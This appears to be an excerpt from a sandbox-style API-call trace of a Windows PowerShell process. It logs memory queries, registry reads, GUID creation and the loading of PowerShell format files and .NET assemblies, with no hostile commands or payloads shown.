	[0156.327] VirtualQuery (in: lpAddress=0x17c390, lpBuffer=0x17d250, dwLength=0x30 | out: lpBuffer=0x17d250*(BaseAddress=0x17c000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.328] VirtualQuery (in: lpAddress=0x17c390, lpBuffer=0x17d250, dwLength=0x30 | out: lpBuffer=0x17d250*(BaseAddress=0x17c000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.329] VirtualQuery (in: lpAddress=0x17c390, lpBuffer=0x17d250, dwLength=0x30 | out: lpBuffer=0x17d250*(BaseAddress=0x17c000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.332] VirtualQuery (in: lpAddress=0x17c390, lpBuffer=0x17d250, dwLength=0x30 | out: lpBuffer=0x17d250*(BaseAddress=0x17c000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.348] VirtualQuery (in: lpAddress=0x17c390, lpBuffer=0x17d250, dwLength=0x30 | out: lpBuffer=0x17d250*(BaseAddress=0x17c000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.349] VirtualQuery (in: lpAddress=0x17c390, lpBuffer=0x17d250, dwLength=0x30 | out: lpBuffer=0x17d250*(BaseAddress=0x17c000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.351] VirtualQuery (in: lpAddress=0x17c390, lpBuffer=0x17d250, dwLength=0x30 | out: lpBuffer=0x17d250*(BaseAddress=0x17c000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.356] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0159.356] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.357] CoTaskMemFree (pv=0x42e2b0) 
	[0160.023] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0160.023] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.029] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0160.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.032] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0160.032] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.034] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0160.034] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.034] CoTaskMemFree (pv=0x42e2b0) 
	[0160.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x17ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.036] SetErrorMode (uMode=0x1) returned 0x1
	[0160.036] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d0
	[0160.054] GetFileType (hFile=0x1d0) returned 0x1
	[0160.054] SetErrorMode (uMode=0x1) returned 0x1
	[0160.054] GetFileType (hFile=0x1d0) returned 0x1
	[0160.054] ReadFile (in: hFile=0x1d0, lpBuffer=0x323f4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d3b8, lpOverlapped=0x0 | out: lpBuffer=0x323f4c0*, lpNumberOfBytesRead=0x17d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.092] ReadFile (in: hFile=0x1d0, lpBuffer=0x323f4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d3b8, lpOverlapped=0x0 | out: lpBuffer=0x323f4c0*, lpNumberOfBytesRead=0x17d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.109] ReadFile (in: hFile=0x1d0, lpBuffer=0x323f4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d3b8, lpOverlapped=0x0 | out: lpBuffer=0x323f4c0*, lpNumberOfBytesRead=0x17d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.134] ReadFile (in: hFile=0x1d0, lpBuffer=0x323f4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d3b8, lpOverlapped=0x0 | out: lpBuffer=0x323f4c0*, lpNumberOfBytesRead=0x17d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.156] ReadFile (in: hFile=0x1d0, lpBuffer=0x323f4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d3b8, lpOverlapped=0x0 | out: lpBuffer=0x323f4c0*, lpNumberOfBytesRead=0x17d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.186] ReadFile (in: hFile=0x1d0, lpBuffer=0x323f4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d3b8, lpOverlapped=0x0 | out: lpBuffer=0x323f4c0*, lpNumberOfBytesRead=0x17d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.190] ReadFile (in: hFile=0x1d0, lpBuffer=0x323f4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d3b8, lpOverlapped=0x0 | out: lpBuffer=0x323f4c0*, lpNumberOfBytesRead=0x17d3b8*=0x9e2, lpOverlapped=0x0) returned 1
	[0160.195] ReadFile (in: hFile=0x1d0, lpBuffer=0x323ea0a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x17d3b8, lpOverlapped=0x0 | out: lpBuffer=0x323ea0a*, lpNumberOfBytesRead=0x17d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0160.200] ReadFile (in: hFile=0x1d0, lpBuffer=0x323f4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d3b8, lpOverlapped=0x0 | out: lpBuffer=0x323f4c0*, lpNumberOfBytesRead=0x17d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0160.203] CloseHandle (hObject=0x1d0) returned 1
	[0160.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x17d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.228] SetErrorMode (uMode=0x1) returned 0x1
	[0160.228] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x17d360 | out: lpFileInformation=0x17d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0160.489] SetErrorMode (uMode=0x1) returned 0x1
	[0160.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x17d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.490] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d448 | out: phkResult=0x17d448*=0x1d0) returned 0x0
	[0160.490] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x17d3cc, lpData=0x0, lpcbData=0x17d3c8*=0x0 | out: lpType=0x17d3cc*=0x1, lpData=0x0, lpcbData=0x17d3c8*=0x56) returned 0x0
	[0160.490] CoTaskMemAlloc (cb=0x5a) returned 0x443d70
	[0160.490] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x17d39c, lpData=0x443d70, lpcbData=0x17d398*=0x56 | out: lpType=0x17d39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x17d398*=0x56) returned 0x0
	[0160.490] CoTaskMemFree (pv=0x443d70) 
	[0160.490] RegCloseKey (hKey=0x1d0) returned 0x0
	[0160.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x17d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x17cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.499] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0x29e7cd, Data2=0xf76c, Data3=0x4e42, Data4=([0]=0xac, [1]=0xef, [2]=0x21, [3]=0x5e, [4]=0x6b, [5]=0x16, [6]=0x60, [7]=0xe7))) returned 0x0
	[0160.515] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0xc9766a48, Data2=0x5ce2, Data3=0x4b38, Data4=([0]=0xb0, [1]=0xf2, [2]=0x5c, [3]=0x20, [4]=0xb7, [5]=0x65, [6]=0x54, [7]=0x5))) returned 0x0
	[0163.338] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0xe2980150, Data2=0x56d4, Data3=0x4b2b, Data4=([0]=0x96, [1]=0x67, [2]=0xcc, [3]=0xd1, [4]=0x36, [5]=0x29, [6]=0x5f, [7]=0x50))) returned 0x0
	[0163.345] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0x8eea9c5, Data2=0x4546, Data3=0x44c8, Data4=([0]=0x89, [1]=0x17, [2]=0x47, [3]=0x83, [4]=0x30, [5]=0x63, [6]=0xa3, [7]=0x73))) returned 0x0
	[0163.347] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0x2ac4b08f, Data2=0x2c7c, Data3=0x4267, Data4=([0]=0xb9, [1]=0xe6, [2]=0x40, [3]=0xdd, [4]=0x56, [5]=0xb, [6]=0xb, [7]=0xbd))) returned 0x0
	[0163.348] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0x2581d735, Data2=0xdbd0, Data3=0x45ab, Data4=([0]=0xb0, [1]=0x54, [2]=0x81, [3]=0xcb, [4]=0xa1, [5]=0xda, [6]=0x34, [7]=0xcf))) returned 0x0
	[0163.348] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0x83bac626, Data2=0xe709, Data3=0x41ef, Data4=([0]=0x92, [1]=0xb6, [2]=0xf7, [3]=0x4d, [4]=0xc5, [5]=0xc1, [6]=0x8d, [7]=0xe5))) returned 0x0
	[0163.349] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0x157bc70, Data2=0xbcf8, Data3=0x4df4, Data4=([0]=0x99, [1]=0x8a, [2]=0x4a, [3]=0x58, [4]=0xef, [5]=0xaa, [6]=0xba, [7]=0x52))) returned 0x0
	[0163.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x17ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0163.350] SetErrorMode (uMode=0x1) returned 0x1
	[0163.350] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d0
	[0163.351] GetFileType (hFile=0x1d0) returned 0x1
	[0163.351] SetErrorMode (uMode=0x1) returned 0x1
	[0163.351] GetFileType (hFile=0x1d0) returned 0x1
	[0163.351] ReadFile (in: hFile=0x1d0, lpBuffer=0x32b5d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d3b8, lpOverlapped=0x0 | out: lpBuffer=0x32b5d88*, lpNumberOfBytesRead=0x17d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0163.352] ReadFile (in: hFile=0x1d0, lpBuffer=0x32b5d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d3b8, lpOverlapped=0x0 | out: lpBuffer=0x32b5d88*, lpNumberOfBytesRead=0x17d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0163.353] ReadFile (in: hFile=0x1d0, lpBuffer=0x32b5d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d3b8, lpOverlapped=0x0 | out: lpBuffer=0x32b5d88*, lpNumberOfBytesRead=0x17d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0163.353] ReadFile (in: hFile=0x1d0, lpBuffer=0x32b5d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d3b8, lpOverlapped=0x0 | out: lpBuffer=0x32b5d88*, lpNumberOfBytesRead=0x17d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0163.355] ReadFile (in: hFile=0x1d0, lpBuffer=0x32b5d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d3b8, lpOverlapped=0x0 | out: lpBuffer=0x32b5d88*, lpNumberOfBytesRead=0x17d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0163.355] ReadFile (in: hFile=0x1d0, lpBuffer=0x32b5d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d3b8, lpOverlapped=0x0 | out: lpBuffer=0x32b5d88*, lpNumberOfBytesRead=0x17d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0163.355] ReadFile (in: hFile=0x1d0, lpBuffer=0x32b5d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d3b8, lpOverlapped=0x0 | out: lpBuffer=0x32b5d88*, lpNumberOfBytesRead=0x17d3b8*=0xaca, lpOverlapped=0x0) returned 1
	[0163.355] ReadFile (in: hFile=0x1d0, lpBuffer=0x32b53ba, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x17d3b8, lpOverlapped=0x0 | out: lpBuffer=0x32b53ba*, lpNumberOfBytesRead=0x17d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0163.355] ReadFile (in: hFile=0x1d0, lpBuffer=0x32b5d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d3b8, lpOverlapped=0x0 | out: lpBuffer=0x32b5d88*, lpNumberOfBytesRead=0x17d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0163.355] CloseHandle (hObject=0x1d0) returned 1
	[0163.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x17d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0163.355] SetErrorMode (uMode=0x1) returned 0x1
	[0163.356] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x17d360 | out: lpFileInformation=0x17d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0163.356] SetErrorMode (uMode=0x1) returned 0x1
	[0163.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x17d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0163.356] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d448 | out: phkResult=0x17d448*=0x1d0) returned 0x0
	[0163.356] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x17d3cc, lpData=0x0, lpcbData=0x17d3c8*=0x0 | out: lpType=0x17d3cc*=0x1, lpData=0x0, lpcbData=0x17d3c8*=0x56) returned 0x0
	[0163.356] CoTaskMemAlloc (cb=0x5a) returned 0x444240
	[0163.356] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x17d39c, lpData=0x444240, lpcbData=0x17d398*=0x56 | out: lpType=0x17d39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x17d398*=0x56) returned 0x0
	[0163.356] CoTaskMemFree (pv=0x444240) 
	[0163.356] RegCloseKey (hKey=0x1d0) returned 0x0
	[0163.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x17d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0163.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x17cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0163.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x17c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0163.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x17c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0163.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x17c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0163.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0170.157] VirtualQuery (in: lpAddress=0x17bee0, lpBuffer=0x17cda0, dwLength=0x30 | out: lpBuffer=0x17cda0*(BaseAddress=0x17b000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0170.158] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0xffec0324, Data2=0x7a9d, Data3=0x4a9a, Data4=([0]=0x96, [1]=0x18, [2]=0x6, [3]=0xc1, [4]=0x5f, [5]=0x20, [6]=0xdb, [7]=0x61))) returned 0x0
	[0170.159] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0x4838558b, Data2=0x7ec3, Data3=0x473d, Data4=([0]=0xa6, [1]=0xef, [2]=0x6c, [3]=0xb9, [4]=0x1a, [5]=0x95, [6]=0x7b, [7]=0x1))) returned 0x0
	[0170.160] VirtualQuery (in: lpAddress=0x17c090, lpBuffer=0x17cf50, dwLength=0x30 | out: lpBuffer=0x17cf50*(BaseAddress=0x17c000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0170.161] VirtualQuery (in: lpAddress=0x17c090, lpBuffer=0x17cf50, dwLength=0x30 | out: lpBuffer=0x17cf50*(BaseAddress=0x17c000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0170.162] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0x3654261c, Data2=0xb37, Data3=0x4230, Data4=([0]=0x83, [1]=0xa3, [2]=0xd8, [3]=0x7a, [4]=0xfb, [5]=0x8e, [6]=0x68, [7]=0xd7))) returned 0x0
	[0170.165] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0x97e1d4cd, Data2=0x59bb, Data3=0x4e48, Data4=([0]=0x83, [1]=0xab, [2]=0x37, [3]=0xab, [4]=0x3c, [5]=0xf7, [6]=0xbf, [7]=0x5c))) returned 0x0
	[0170.165] VirtualQuery (in: lpAddress=0x17c2e0, lpBuffer=0x17d1a0, dwLength=0x30 | out: lpBuffer=0x17d1a0*(BaseAddress=0x17c000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0170.169] VirtualQuery (in: lpAddress=0x17b950, lpBuffer=0x17c810, dwLength=0x30 | out: lpBuffer=0x17c810*(BaseAddress=0x17b000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0170.781] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0x50e418, Data2=0x6c58, Data3=0x49e6, Data4=([0]=0x98, [1]=0x69, [2]=0xa0, [3]=0x8a, [4]=0x1e, [5]=0x29, [6]=0xb4, [7]=0xd1))) returned 0x0
	[0170.782] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0x3ee2704a, Data2=0x82a3, Data3=0x4f31, Data4=([0]=0xbc, [1]=0xf, [2]=0x80, [3]=0x7c, [4]=0x29, [5]=0x87, [6]=0xbe, [7]=0x70))) returned 0x0
	[0170.783] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0xbfa39dc4, Data2=0xbcca, Data3=0x488f, Data4=([0]=0x86, [1]=0x5e, [2]=0x13, [3]=0x1b, [4]=0xbe, [5]=0x58, [6]=0xa7, [7]=0x76))) returned 0x0
	[0170.783] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0x6e51fb26, Data2=0x2472, Data3=0x4bb8, Data4=([0]=0x8d, [1]=0x69, [2]=0xd8, [3]=0x16, [4]=0xc5, [5]=0x65, [6]=0xaa, [7]=0xce))) returned 0x0
	[0170.783] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0xd5910d24, Data2=0x740c, Data3=0x4bd5, Data4=([0]=0x91, [1]=0x12, [2]=0xb3, [3]=0x34, [4]=0xf5, [5]=0x74, [6]=0x6, [7]=0xc))) returned 0x0
	[0170.784] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0xa2b6d6fb, Data2=0xaf52, Data3=0x4547, Data4=([0]=0x95, [1]=0xc5, [2]=0x62, [3]=0xcd, [4]=0xfe, [5]=0x44, [6]=0x5d, [7]=0xba))) returned 0x0
	[0170.784] VirtualQuery (in: lpAddress=0x17c020, lpBuffer=0x17cee0, dwLength=0x30 | out: lpBuffer=0x17cee0*(BaseAddress=0x17c000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0170.785] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0x282b91ef, Data2=0x3094, Data3=0x4d4f, Data4=([0]=0x96, [1]=0xa5, [2]=0x66, [3]=0xee, [4]=0x74, [5]=0xf3, [6]=0x95, [7]=0x3d))) returned 0x0
	[0170.785] VirtualQuery (in: lpAddress=0x17c020, lpBuffer=0x17cee0, dwLength=0x30 | out: lpBuffer=0x17cee0*(BaseAddress=0x17c000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0170.786] VirtualQuery (in: lpAddress=0x17c020, lpBuffer=0x17cee0, dwLength=0x30 | out: lpBuffer=0x17cee0*(BaseAddress=0x17c000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0183.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0183.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0183.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0183.595] CoCreateGuid (in: pguid=0x17d670 | out: pguid=0x17d670*(Data1=0x3f2a0f25, Data2=0x1705, Data3=0x4e68, Data4=([0]=0x95, [1]=0x0, [2]=0x65, [3]=0xf1, [4]=0xbe, [5]=0x8c, [6]=0xf6, [7]=0xce))) returned 0x0
